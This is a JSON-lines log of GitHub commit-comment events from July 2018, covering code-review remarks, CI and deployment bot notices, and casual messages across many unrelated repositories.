{"id":"7923189396","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29606470,"position":null,"line":null,"path":null,"commit_id":"d7ac5474dd0582be35e2290d95f5fe610aee2963","created_at":"2018-07-05T13:22:56Z","updated_at":"2018-07-05T13:22:56Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/jenkins-device-tests/4/display/redirect) (on internal Jenkins) failed in stage 'Publish builds to GitHub' 🔥 : java.lang.Exception: Skipping the rest for now\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/jenkins-device-tests/4//console)\n"}},"created_at":"2018-07-05T13:22:56Z"}
{"id":"7923189534","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29606472,"position":null,"line":null,"path":null,"commit_id":"bde00b0359ae96c75ac58ad5d8ef15374facbe4b","created_at":"2018-07-05T13:22:57Z","updated_at":"2018-07-05T13:22:57Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://752b6568.ngrok.io/ui#review:id=372)"}},"created_at":"2018-07-05T13:22:57Z"}
{"id":"7923191645","type":"CommitCommentEvent","actor":{"login":"dosowen"},"repo":{"name":"dosowen/products"},"payload":{"comment":{"id":29606478,"position":null,"line":null,"path":null,"commit_id":"db63027ac63df27c6ac95592f066576f84f6e9fc","created_at":"2018-07-05T13:23:17Z","updated_at":"2018-07-05T13:23:17Z","author_association":"OWNER","body":"OMG!!!!!!!!!!\r\n"}},"created_at":"2018-07-05T13:23:17Z"}
{"id":"7923191680","type":"CommitCommentEvent","actor":{"login":"chris-stg"},"repo":{"name":"chris-stg/mod-gift-guide"},"payload":{"comment":{"id":29606479,"position":null,"line":null,"path":null,"commit_id":"2f6866aef2b76663c2b6cee08666aa19257df46f","created_at":"2018-07-05T13:23:18Z","updated_at":"2018-07-05T13:23:18Z","author_association":"OWNER","body":"Created multidev environment [mod-gift-guide#ci-36](https://dashboard.pantheon.io/sites/72035e91-bbeb-4fea-aa37-97b7ccd79d43#ci-36).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-36-mod-gift-guide.pantheonsite.io/)"}},"created_at":"2018-07-05T13:23:18Z"}
{"id":"7923221883","type":"CommitCommentEvent","actor":{"login":"andyone"},"repo":{"name":"essentialkaos/anicorn"},"payload":{"comment":{"id":29606580,"position":16,"line":162,"path":"SOURCES/anicorn","commit_id":"3668d28a9442e4b0f01e1cc743f4a60ca4f39822","created_at":"2018-07-05T13:28:24Z","updated_at":"2018-07-05T13:28:24Z","author_association":"MEMBER","body":"Can be simplified to:\r\n```bash\r\ngrep -qaE \"^unicorn\" \"/proc/$pid/cmdline\"\r\nreturn $?\r\n```\r\n\r\nIn this case, we don't spawn subshell for `grep` command."}},"created_at":"2018-07-05T13:28:24Z"}
{"id":"7923223886","type":"CommitCommentEvent","actor":{"login":"aleos89"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29606583,"position":null,"line":null,"path":null,"commit_id":"e13ca63cc8accb5ad4c8d711c6dfd5b954f4967e","created_at":"2018-07-05T13:28:44Z","updated_at":"2018-07-05T13:28:44Z","author_association":"CONTRIBUTOR","body":"rAthena is already setup to handle this. Players are able to pull out the items until they are below 500 before they can start adding back in."}},"created_at":"2018-07-05T13:28:44Z"}
{"id":"7923225352","type":"CommitCommentEvent","actor":{"login":"Untrustedlife"},"repo":{"name":"Revolutionary-Games/Thrive"},"payload":{"comment":{"id":29606589,"position":15,"line":287,"path":"scripts/microbe_stage/microbe_ai.as","commit_id":"5e610c21f562bef8e2041d3eeaf97711838a0b98","created_at":"2018-07-05T13:29:00Z","updated_at":"2018-07-05T13:29:00Z","author_association":"CONTRIBUTOR","body":"Alright, I'll make that change when i get home tonight."}},"created_at":"2018-07-05T13:29:00Z"}
{"id":"7923228907","type":"CommitCommentEvent","actor":{"login":"andyone"},"repo":{"name":"essentialkaos/anicorn"},"payload":{"comment":{"id":29606595,"position":8,"line":154,"path":"SOURCES/anicorn","commit_id":"3668d28a9442e4b0f01e1cc743f4a60ca4f39822","created_at":"2018-07-05T13:29:36Z","updated_at":"2018-07-05T13:29:36Z","author_association":"MEMBER","body":"This function returns an exit code."}},"created_at":"2018-07-05T13:29:36Z"}
{"id":"7923239537","type":"CommitCommentEvent","actor":{"login":"Sherkhan1991"},"repo":{"name":"Sherkhan1991/crypto"},"payload":{"comment":{"id":29606617,"position":null,"line":null,"path":null,"commit_id":"2104c37e83f8f42e626f1db1f9d4dcc70df84a67","created_at":"2018-07-05T13:31:22Z","updated_at":"2018-07-05T13:31:22Z","author_association":"OWNER","body":"Mysql Data Types Idea\r\n\r\nhttps://www.w3resource.com/mysql/mysql-data-types.php\r\n\r\nhttps://www.w3schools.com/sql/sql_datatypes.asp\r\n"}},"created_at":"2018-07-05T13:31:22Z"}
{"id":"7923244654","type":"CommitCommentEvent","actor":{"login":"xiaoyougithub"},"repo":{"name":"xiaoyougithub/xiaoyouku"},"payload":{"comment":{"id":29606629,"position":null,"line":null,"path":null,"commit_id":"352c94180521ae20a49d9834450c9f9152e8b1e6","created_at":"2018-07-05T13:32:14Z","updated_at":"2018-07-05T13:32:14Z","author_association":"OWNER","body":"嘀嘀嘀嘀嘀嘀嘀嘀嘀！"}},"created_at":"2018-07-05T13:32:14Z"}
{"id":"7923244956","type":"CommitCommentEvent","actor":{"login":"StormNotes"},"repo":{"name":"StormNotes/chi"},"payload":{"comment":{"id":29606631,"position":null,"line":null,"path":null,"commit_id":"662ae66be78469badc678ba5aed4bcc9e6c6eb87","created_at":"2018-07-05T13:32:17Z","updated_at":"2018-07-05T13:32:17Z","author_association":"OWNER","body":"update of a word"}},"created_at":"2018-07-05T13:32:17Z"}
{"id":"7923247387","type":"CommitCommentEvent","actor":{"login":"abelbeck"},"repo":{"name":"arno-iptables-firewall/aif"},"payload":{"comment":{"id":29606642,"position":null,"line":null,"path":null,"commit_id":"b5bc2cf37af3c2c18d42aa0f58e8ab5118e00a0e","created_at":"2018-07-05T13:32:43Z","updated_at":"2018-07-05T13:32:43Z","author_association":"CONTRIBUTOR","body":"How about one set of quotes surrounding “s/ ... /g”"}},"created_at":"2018-07-05T13:32:43Z"}
{"id":"7923248697","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":29606648,"position":null,"line":null,"path":null,"commit_id":"fa48b6efdc8516c50555becf5debabbbbd8bfab5","created_at":"2018-07-05T13:32:57Z","updated_at":"2018-07-05T13:32:57Z","author_association":"MEMBER","body":"An [example][1] 😉 \r\nBtw, go ahead, no problem!\r\n\r\n[1]: https://github.com/vvv-school/vvv-school.github.io/blob/master/scripts/smoke-test-cpp.sh#L80-L87\r\n"}},"created_at":"2018-07-05T13:32:57Z"}
{"id":"7923249426","type":"CommitCommentEvent","actor":{"login":"xiaoyougithub"},"repo":{"name":"xiaoyougithub/xiaoyouku"},"payload":{"comment":{"id":29606649,"position":null,"line":null,"path":null,"commit_id":"352c94180521ae20a49d9834450c9f9152e8b1e6","created_at":"2018-07-05T13:33:05Z","updated_at":"2018-07-05T13:33:05Z","author_association":"OWNER","body":"滴滴滴滴滴滴滴滴滴滴滴滴！"}},"created_at":"2018-07-05T13:33:05Z"}
{"id":"7923254474","type":"CommitCommentEvent","actor":{"login":"YuriSilenok"},"repo":{"name":"Students-of-the-city-of-Kostroma/Student-timetable"},"payload":{"comment":{"id":29606664,"position":1,"line":1,"path":"TimetableOfClasses/MTeacher.cs","commit_id":"35f64b3d6d8aa2220e309fa3a8f52982233f360c","created_at":"2018-07-05T13:33:58Z","updated_at":"2018-07-05T13:33:58Z","author_association":"CONTRIBUTOR","body":"Эти классы нужно было делать в библиотеке (LibOfTimetableOfClasses), а не в основном проекте"}},"created_at":"2018-07-05T13:33:58Z"}
{"id":"7923259736","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":29606681,"position":null,"line":null,"path":null,"commit_id":"33dc232d6ffcd985f52bf8b1a56b497033b6b52f","created_at":"2018-07-05T13:34:53Z","updated_at":"2018-07-05T13:34:53Z","author_association":"MEMBER","body":"Looks good, anyway (given the link to the doc and a re-read)."}},"created_at":"2018-07-05T13:34:53Z"}
{"id":"7923261503","type":"CommitCommentEvent","actor":{"login":"takluyver"},"repo":{"name":"takluyver/h5py"},"payload":{"comment":{"id":29606690,"position":24,"line":24,"path":"examples/vds_simple.py","commit_id":"9b38539c1828af1c45ac736fccda907cded65c24","created_at":"2018-07-05T13:35:12Z","updated_at":"2018-07-05T13:35:12Z","author_association":"OWNER","body":"Thanks! So I think this should just throw a clearer error sooner - the shape parameter is required unless you pass a dataset object. I'll add that."}},"created_at":"2018-07-05T13:35:12Z"}
{"id":"7923262852","type":"CommitCommentEvent","actor":{"login":"SHsmallpea"},"repo":{"name":"SHsmallpea/web"},"payload":{"comment":{"id":29606694,"position":1,"line":1,"path":"CNAME","commit_id":"a32a42f6c9e148f5e5cb67d6ff27ea9a300b7711","created_at":"2018-07-05T13:35:25Z","updated_at":"2018-07-05T13:35:25Z","author_association":"OWNER","body":"smsmallpea。xyz"}},"created_at":"2018-07-05T13:35:25Z"}
{"id":"7923269009","type":"CommitCommentEvent","actor":{"login":"admkakaroto"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29606710,"position":null,"line":null,"path":null,"commit_id":"e13ca63cc8accb5ad4c8d711c6dfd5b954f4967e","created_at":"2018-07-05T13:36:28Z","updated_at":"2018-07-05T13:36:28Z","author_association":"CONTRIBUTOR","body":"Strange, I did the following test:\r\n\r\n1. I got an emulator without this update, I put 600 items in the gstorage.\r\n\r\n2. I switched to an emulator with this update.\r\n\r\n3. I used the @cleargstorage command.\r\n\r\n4. Deleted all items except 12, I could not remove the 12 items from there.\r\n\r\n5. I put 10 items, again used the @cleargstorage command, cleared all but the 12 previous items."}},"created_at":"2018-07-05T13:36:28Z"}
{"id":"7923270883","type":"CommitCommentEvent","actor":{"login":"janekptacijarabaci"},"repo":{"name":"janekptacijarabaci/UXP"},"payload":{"comment":{"id":29606711,"position":null,"line":null,"path":null,"commit_id":"a80267e9e88b3dcebf7f8f1f6f10931a99ddf2ca","created_at":"2018-07-05T13:36:49Z","updated_at":"2018-07-05T13:36:49Z","author_association":"OWNER","body":"Tag #596 "}},"created_at":"2018-07-05T13:36:49Z"}
{"id":"7923272006","type":"CommitCommentEvent","actor":{"login":"sandeepsw"},"repo":{"name":"amar-shieldwatch/test"},"payload":{"comment":{"id":29606713,"position":null,"line":null,"path":null,"commit_id":"ac7793afb5388dd67d906b0c71523384898aca96","created_at":"2018-07-05T13:37:01Z","updated_at":"2018-07-05T13:37:01Z","author_association":"COLLABORATOR","body":"changes made on page title"}},"created_at":"2018-07-05T13:37:01Z"}
{"id":"7923274248","type":"CommitCommentEvent","actor":{"login":"admkakaroto"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29606719,"position":null,"line":null,"path":null,"commit_id":"e13ca63cc8accb5ad4c8d711c6dfd5b954f4967e","created_at":"2018-07-05T13:37:24Z","updated_at":"2018-07-05T13:37:24Z","author_association":"CONTRIBUTOR","body":"I'm going to test again just for warranty."}},"created_at":"2018-07-05T13:37:24Z"}
{"id":"7923275083","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/linux-modder.github.io"},"payload":{"comment":{"id":29606721,"position":null,"line":null,"path":null,"commit_id":"3bb4a21ca161c61c68702d47bc5c236f7076681c","created_at":"2018-07-05T13:37:33Z","updated_at":"2018-07-05T13:37:33Z","author_association":"OWNER","body":"People can see in the dark faster than light"}},"created_at":"2018-07-05T13:37:33Z"}
{"id":"7923279328","type":"CommitCommentEvent","actor":{"login":"jlgzb"},"repo":{"name":"jlgzb/getting-and-cleaning-data"},"payload":{"comment":{"id":29606726,"position":null,"line":null,"path":null,"commit_id":"9c2fbfdc8b3886b139596dc6394e918f15421a1a","created_at":"2018-07-05T13:38:18Z","updated_at":"2018-07-05T13:38:18Z","author_association":"OWNER","body":"the final generated tidy data of this project"}},"created_at":"2018-07-05T13:38:18Z"}
{"id":"7923279624","type":"CommitCommentEvent","actor":{"login":"n18023"},"repo":{"name":"n18023/programming-term2"},"payload":{"comment":{"id":29606727,"position":null,"line":null,"path":null,"commit_id":"def533ab106384b2859d56b6a1d18a26ec880136","created_at":"2018-07-05T13:38:20Z","updated_at":"2018-07-05T13:38:20Z","author_association":"OWNER","body":"金城先生\r\n\r\n御忙しい中,失礼致します。指摘ありがとうございます。早急に直そうと思います。  平敷大賀\r\n\r\n2018年7月5日 21:36 kinjo-icolle <notifications@github.com>:\r\n\r\n> 全体的に、特別な理由がなければ空の行は2行以上空けないようにしてください。\r\n> また、代入のイコールや、演算子(+, -, *, /など)は前後両方にスペースを入れると美しくなります。\r\n>\r\n> hanaya-var.py\r\n> ちょっと細かいですが、\r\n> rateに(1 - 0.1)を代入しています。個人的にはこれは「割引率」というより\r\n> 「割り引いた結果の率」と思います。\r\n> 計算結果的にはOKです。\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/n18023/programming-term2/commit/def533ab106384b2859d56b6a1d18a26ec880136#commitcomment-29605835>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/Alf584P_q1_qmniM2bkpJOKBcUzSztaaks5uDghagaJpZM4VDzf_>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-05T13:38:20Z"}
{"id":"7923280492","type":"CommitCommentEvent","actor":{"login":"1122blyy"},"repo":{"name":"retexhacker/retex-hacker-ksa"},"payload":{"comment":{"id":29606729,"position":null,"line":null,"path":null,"commit_id":"376bf7ddcce5cdbb862c6849556d4fce0a629773","created_at":"2018-07-05T13:38:30Z","updated_at":"2018-07-05T13:38:30Z","author_association":"NONE","body":"LS"}},"created_at":"2018-07-05T13:38:30Z"}
{"id":"7923281182","type":"CommitCommentEvent","actor":{"login":"osallou"},"repo":{"name":"BioContainers/containers"},"payload":{"comment":{"id":29606731,"position":null,"line":null,"path":null,"commit_id":"fec3a40b6232c03ccc82b76cbf898586f6889ef6","created_at":"2018-07-05T13:38:37Z","updated_at":"2018-07-05T13:38:37Z","author_association":"CONTRIBUTOR","body":"No coregenebuilder/1.0/test-cmds.txt (test file) present, skipping tests"}},"created_at":"2018-07-05T13:38:37Z"}
{"id":"7923284347","type":"CommitCommentEvent","actor":{"login":"1122blyy"},"repo":{"name":"retexhacker/retex-hacker-ksa"},"payload":{"comment":{"id":29606740,"position":4,"line":3,"path":"ريتكس هكر السعوديه","commit_id":"376bf7ddcce5cdbb862c6849556d4fce0a629773","created_at":"2018-07-05T13:39:11Z","updated_at":"2018-07-05T13:39:11Z","author_association":"NONE","body":"ls"}},"created_at":"2018-07-05T13:39:11Z"}
{"id":"7923285877","type":"CommitCommentEvent","actor":{"login":"drdanz"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":29606742,"position":null,"line":null,"path":null,"commit_id":"fa48b6efdc8516c50555becf5debabbbbd8bfab5","created_at":"2018-07-05T13:39:26Z","updated_at":"2018-07-05T13:39:26Z","author_association":"MEMBER","body":"Wait, that's not what I meant... that code checks if the result is `0` or `not-0`, it does not check if the result is `1`, `2`, `3`..."}},"created_at":"2018-07-05T13:39:26Z"}
{"id":"7923290903","type":"CommitCommentEvent","actor":{"login":"lemmy"},"repo":{"name":"tlaplus/tlaplus"},"payload":{"comment":{"id":29606746,"position":null,"line":null,"path":null,"commit_id":"dff4e408565b32523766b3ab740627657b57e92e","created_at":"2018-07-05T13:40:17Z","updated_at":"2018-07-05T13:40:17Z","author_association":"MEMBER","body":"![rssreader-dff4e408565b32523766b3ab740627657b57e92e](https://user-images.githubusercontent.com/88777/42326534-f1987984-8058-11e8-8dfb-afe2333d9ff2.gif)\r\n"}},"created_at":"2018-07-05T13:40:17Z"}
{"id":"7923301431","type":"CommitCommentEvent","actor":{"login":"qq30435566"},"repo":{"name":"qq30435566/notes"},"payload":{"comment":{"id":29606778,"position":null,"line":null,"path":null,"commit_id":"76ebb22532dc93eabf938d40061643be12f14aaf","created_at":"2018-07-05T13:42:04Z","updated_at":"2018-07-05T13:42:04Z","author_association":"OWNER","body":"两个列表粗暴合并,  lst_1和lst_2中的元素都会保留"}},"created_at":"2018-07-05T13:42:04Z"}
{"id":"7923305196","type":"CommitCommentEvent","actor":{"login":"lukasl66"},"repo":{"name":"AOEpeople/meals-android"},"payload":{"comment":{"id":29606787,"position":null,"line":null,"path":null,"commit_id":"40bc4c67bcb2f773a0f0df5ca508f5fefc9ebbb5","created_at":"2018-07-05T13:42:43Z","updated_at":"2018-07-05T13:42:43Z","author_association":"NONE","body":"Ah und der wird ja auch getriggert, wenn die Seite lädt. Alles klar."}},"created_at":"2018-07-05T13:42:43Z"}
{"id":"7923305337","type":"CommitCommentEvent","actor":{"login":"chris-stg"},"repo":{"name":"chris-stg/mod-gift-guide"},"payload":{"comment":{"id":29606789,"position":null,"line":null,"path":null,"commit_id":"addc78d7edb5bc66a31a600057f202d8c5045573","created_at":"2018-07-05T13:42:45Z","updated_at":"2018-07-05T13:42:45Z","author_association":"OWNER","body":"Created multidev environment [mod-gift-guide#ci-38](https://dashboard.pantheon.io/sites/72035e91-bbeb-4fea-aa37-97b7ccd79d43#ci-38).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-38-mod-gift-guide.pantheonsite.io/)"}},"created_at":"2018-07-05T13:42:45Z"}
{"id":"7923308027","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":29606791,"position":null,"line":null,"path":null,"commit_id":"fa48b6efdc8516c50555becf5debabbbbd8bfab5","created_at":"2018-07-05T13:43:13Z","updated_at":"2018-07-05T13:43:13Z","author_association":"MEMBER","body":"Yes, mine was just an example; there are no exit codes greater than 1, presently 👍 "}},"created_at":"2018-07-05T13:43:13Z"}
{"id":"7923308162","type":"CommitCommentEvent","actor":{"login":"delagoya"},"repo":{"name":"umccr/umccrise-ami"},"payload":{"comment":{"id":29606794,"position":null,"line":null,"path":null,"commit_id":"ba3d44eb184bcb3cb5758421cbf8de1f247e8df0","created_at":"2018-07-05T13:43:14Z","updated_at":"2018-07-05T13:43:14Z","author_association":"NONE","body":"That's a part of our documentation on preparing a custom compute resource AMI for AWS Batch :\r\nhttps://docs.aws.amazon.com/batch/latest/userguide/create-batch-ami.html\r\n\r\n\r\n"}},"created_at":"2018-07-05T13:43:14Z"}
{"id":"7923315160","type":"CommitCommentEvent","actor":{"login":"aviatesk"},"repo":{"name":"aviatesk/graph-theory"},"payload":{"comment":{"id":29606814,"position":null,"line":null,"path":null,"commit_id":"e987d6cc1e6887cdde66a6280c1216d701cd78d9","created_at":"2018-07-05T13:44:25Z","updated_at":"2018-07-05T13:44:25Z","author_association":"OWNER","body":"from google colab"}},"created_at":"2018-07-05T13:44:25Z"}
{"id":"7923315677","type":"CommitCommentEvent","actor":{"login":"deletescape"},"repo":{"name":"hundeva/Lean-Launcher"},"payload":{"comment":{"id":29606816,"position":null,"line":null,"path":null,"commit_id":"662b753cfd35abaad14e0570e6cf5af7bf8a5b23","created_at":"2018-07-05T13:44:31Z","updated_at":"2018-07-05T13:44:31Z","author_association":"NONE","body":"This is fixed by declaring the following huawei specific permission in your App manifest :)\r\n\r\n```xml\r\n<!-- The following is NOT a typo, it is actually called wallpaperservcie ¯\\_(ツ)_/¯ -->\r\n<uses-permission android:name=\"com.huawei.wallpaperservcie.permission.SET_WALLPAPER_OFFSET\" />\r\n```"}},"created_at":"2018-07-05T13:44:31Z"}
{"id":"7923316073","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29606817,"position":null,"line":null,"path":null,"commit_id":"5293a811909dd27eff07c45597b0c9cce11444fc","created_at":"2018-07-05T13:44:35Z","updated_at":"2018-07-05T13:44:35Z","author_association":"COLLABORATOR","body":"Puzzle `215-3296d73b` discovered in   [`stroyprombeton/tests/tests_selenium_admin.py`](  https://github.com/fidals/stroyprombeton/blob/master/stroyprombeton/tests/tests_selenium_admin.py)   and submitted as #235. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-05T13:44:35Z"}
{"id":"7923334229","type":"CommitCommentEvent","actor":{"login":"delagoya"},"repo":{"name":"umccr/umccrise-ami"},"payload":{"comment":{"id":29606850,"position":null,"line":null,"path":null,"commit_id":"ba3d44eb184bcb3cb5758421cbf8de1f247e8df0","created_at":"2018-07-05T13:47:39Z","updated_at":"2018-07-05T13:47:39Z","author_association":"NONE","body":"Also see the AMI checker script that has some other items for Task networking and being able to grab the right permissions if you intend to use IAM Roles for ECS Tasks. This is different from a Task container leveraging IAM Instance Profile roles. \r\n\r\nThe reason you may want to have separate Task vs Instance IAM Roles is that you may want the instance to have access to a different set of resources than the task. For example, the a task that updates a DynamoDB table needs access to DDB, but the instance should not have that access full time. \r\n\r\nFor more info on ECS Task Roles, see: https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html    "}},"created_at":"2018-07-05T13:47:39Z"}
{"id":"7923348314","type":"CommitCommentEvent","actor":{"login":"didilinkin"},"repo":{"name":"didilinkin/react-admin-antd"},"payload":{"comment":{"id":29606877,"position":24,"line":24,"path":"src/api/index.js","commit_id":"b06efac02e1a18496aa2f9e4c679acc8b58b556d","created_at":"2018-07-05T13:50:02Z","updated_at":"2018-07-05T13:50:02Z","author_association":"OWNER","body":"是的。可以试用。\r\n\r\n别的方式 可以考虑使用 **Generator 函数 ** 和 **yield* 表达式** "}},"created_at":"2018-07-05T13:50:02Z"}
{"id":"7923348585","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/linux-modder.github.io"},"payload":{"comment":{"id":29606879,"position":null,"line":null,"path":null,"commit_id":"3bb4a21ca161c61c68702d47bc5c236f7076681c","created_at":"2018-07-05T13:50:05Z","updated_at":"2018-07-05T13:50:05Z","author_association":"OWNER","body":"If you can harness the power of sight imagine a science video being watched where the video goes from lab to lab globally, now imagine your eyes as teleporting from lab to lab transporting your body.in split seconds to send a holographic message of concepts in a projection to the video portion of the labs"}},"created_at":"2018-07-05T13:50:05Z"}
{"id":"7923348652","type":"CommitCommentEvent","actor":{"login":"ramadv1"},"repo":{"name":"ramadv1/Printernet"},"payload":{"comment":{"id":29606881,"position":null,"line":null,"path":null,"commit_id":"f87d877ef8ac97787395a783f9b316c2b20cd823","created_at":"2018-07-05T13:50:06Z","updated_at":"2018-07-05T13:50:06Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/40737375/42327026-c15e471e-8038-11e8-8e63-d6225f171b02.png)\r\n"}},"created_at":"2018-07-05T13:50:06Z"}
{"id":"7923349074","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"Arcadiusz/Arkadiusz-Urbanski-Kodilla-java"},"payload":{"comment":{"id":29606883,"position":30,"line":32,"path":"kodilla-patterns/src/main/java/com/kodilla/patterns/factory/tasks/DrivingTask.java","commit_id":"c92707ed58fbc0f4854ff5785f75d3f3854bec68","created_at":"2018-07-05T13:50:11Z","updated_at":"2018-07-05T13:50:11Z","author_association":"NONE","body":"Nie powinieneś nic tutaj przypisywać. Metoda powinna zwracać wartość zmiennej isExecuteStarted z klasy. Nie ma potrzeby tworzenia nowej zmiennej"}},"created_at":"2018-07-05T13:50:11Z"}
{"id":"7923349256","type":"CommitCommentEvent","actor":{"login":"datphamict"},"repo":{"name":"datphamict/bigredbutton"},"payload":{"comment":{"id":29606884,"position":null,"line":null,"path":null,"commit_id":"fda2446289b87c970329743543d342b7b8b4d2a4","created_at":"2018-07-05T13:50:13Z","updated_at":"2018-07-05T13:50:13Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-05T13:50:13Z"}
{"id":"7923350211","type":"CommitCommentEvent","actor":{"login":"adr-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29606887,"position":45,"line":116,"path":"addons/web/static/tests/views/search_view_tests.js","commit_id":"e999caa0c7362bbfc1f04d7bdd714db31fe18a29","created_at":"2018-07-05T13:50:21Z","updated_at":"2018-07-05T13:50:21Z","author_association":"NONE","body":"not align"}},"created_at":"2018-07-05T13:50:21Z"}
{"id":"7923353125","type":"CommitCommentEvent","actor":{"login":"motafa1320"},"repo":{"name":"ethereum/go-ethereum"},"payload":{"comment":{"id":29606897,"position":null,"line":null,"path":null,"commit_id":"390541f6f5bae393b71f068663394c831822b41e","created_at":"2018-07-05T13:50:49Z","updated_at":"2018-07-05T13:50:49Z","author_association":"NONE","body":"Where is block sending messge me?"}},"created_at":"2018-07-05T13:50:49Z"}
{"id":"7923354891","type":"CommitCommentEvent","actor":{"login":"95CivicSi"},"repo":{"name":"PrimeGamesDevTeam/VPNGuard"},"payload":{"comment":{"id":29606901,"position":null,"line":null,"path":null,"commit_id":"a2e946b6895a694b37bf1d3588a6d222d55ce866","created_at":"2018-07-05T13:51:08Z","updated_at":"2018-07-05T13:51:08Z","author_association":"NONE","body":"That's because this plugin needs more than an API bump to be compatible."}},"created_at":"2018-07-05T13:51:08Z"}
{"id":"7923355619","type":"CommitCommentEvent","actor":{"login":"adr-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29606904,"position":54,"line":125,"path":"addons/web/static/tests/views/search_view_tests.js","commit_id":"e999caa0c7362bbfc1f04d7bdd714db31fe18a29","created_at":"2018-07-05T13:51:15Z","updated_at":"2018-07-05T13:51:15Z","author_association":"NONE","body":"not align"}},"created_at":"2018-07-05T13:51:15Z"}
{"id":"7923362816","type":"CommitCommentEvent","actor":{"login":"takluyver"},"repo":{"name":"takluyver/h5py"},"payload":{"comment":{"id":29606934,"position":24,"line":24,"path":"examples/vds_simple.py","commit_id":"9b38539c1828af1c45ac736fccda907cded65c24","created_at":"2018-07-05T13:52:28Z","updated_at":"2018-07-05T13:52:28Z","author_association":"OWNER","body":"Just pushed a new commit, now the error should look like this:\r\n\r\n```\r\nTypeError: The name parameter is required when specifying a source by path\r\n```"}},"created_at":"2018-07-05T13:52:28Z"}
{"id":"7923365045","type":"CommitCommentEvent","actor":{"login":"dagochen"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29606942,"position":null,"line":null,"path":null,"commit_id":"ac29bd0c72b292c10e988a026df3ba2d3aaeda33","created_at":"2018-07-05T13:52:49Z","updated_at":"2018-07-05T13:52:49Z","author_association":"CONTRIBUTOR","body":"For scatter shot it is working. If a creature is immune to confuse/disorient or whats the right name is....the shot deals no damage and does not confuse at all. "}},"created_at":"2018-07-05T13:52:49Z"}
{"id":"7923366225","type":"CommitCommentEvent","actor":{"login":"ajrhacker"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29606949,"position":null,"line":null,"path":null,"commit_id":"790009096b58d6554720fdaa657d8035e0774263","created_at":"2018-07-05T13:53:02Z","updated_at":"2018-07-05T13:53:02Z","author_association":"CONTRIBUTOR","body":"Since it's in an address map now, the emumem core will save it automatically. Look in the debug memory viewer for `memory/:doc/0/00000000-0000ffff/`."}},"created_at":"2018-07-05T13:53:02Z"}
{"id":"7923368211","type":"CommitCommentEvent","actor":{"login":"mjpvandenberg"},"repo":{"name":"andywer/laravel-js-localization"},"payload":{"comment":{"id":29606953,"position":null,"line":null,"path":null,"commit_id":"14b7fa019e7cd7df7571637aa6c2fbe2a3fd4b01","created_at":"2018-07-05T13:53:21Z","updated_at":"2018-07-05T13:53:21Z","author_association":"NONE","body":"It seems that since this commit, resources/js/config.js is no longer included in public/js/localization.min.js. This results in `Config is not defined` errors in the browser console."}},"created_at":"2018-07-05T13:53:21Z"}
{"id":"7923374582","type":"CommitCommentEvent","actor":{"login":"jon-adams"},"repo":{"name":"jgilfelt/android-sqlite-asset-helper"},"payload":{"comment":{"id":29606963,"position":null,"line":null,"path":null,"commit_id":"74a9b0d68aeb1bb0b9778c5598e37da573919ce1","created_at":"2018-07-05T13:54:23Z","updated_at":"2018-07-05T13:54:23Z","author_association":"NONE","body":"@suragch There are several other forks that are available already. I was hoping to not have to start a new repo—to make it easier on current users. But we haven't heard from @jgilfelt for awhile.  😢 "}},"created_at":"2018-07-05T13:54:23Z"}
{"id":"7923375707","type":"CommitCommentEvent","actor":{"login":"kijin"},"repo":{"name":"rhymix/rhymix"},"payload":{"comment":{"id":29606967,"position":null,"line":null,"path":null,"commit_id":"35b73eec0b4ada480ae00247a3aec44d899bb405","created_at":"2018-07-05T13:54:34Z","updated_at":"2018-07-05T13:54:34Z","author_association":"MEMBER","body":"공통 파일 합치기 기능을 사용하는 경우, 일부 파일이 unload된 시점에서 캐시파일(rhymix.min.js)이 생성되면 나중에 모든 파일을 포함해서 로딩해야 할 때도 아까 생성한 캐시파일을 그대로 내보내는 문제가 있습니다. 그러나 이 문제를 고치려면 안 그래도 복잡한 코드가 더 복잡해질 것 같습니다. 그냥 unload 사용시 파일 합치기 기능을 쓸 수 없다고 못박아 버리는 편이 낫겠네요."}},"created_at":"2018-07-05T13:54:34Z"}
